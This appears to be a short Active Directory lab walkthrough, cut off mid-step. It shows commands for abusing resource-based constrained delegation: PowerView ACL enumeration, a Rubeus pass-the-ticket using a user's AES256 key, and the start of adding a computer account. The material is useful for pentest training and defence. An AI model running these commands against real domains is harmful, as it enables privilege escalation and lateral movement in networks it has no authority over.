Loading PowerView

. .\\PowerView.ps1

Now searching for interesting permissions

Find-InterestingDomainAcl | ?{$_.IdentityReferenceName -match 'mgmtadmin'}

Notice that we found out that the user mgmtadmin has Generic Write Permissions on the us-helpdesk Server

Now let’s Abuse the Resource-Based Constrained Delegation

First open session as mgmtadmin user

.\\Rubeus.exe asktgt /user:mgmtadmin /domain:us.techcorp.local /aes256:32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f /ptt

Now let’s list the tickets to validate

klist

Now let’s add the computers

$comp = "student36$"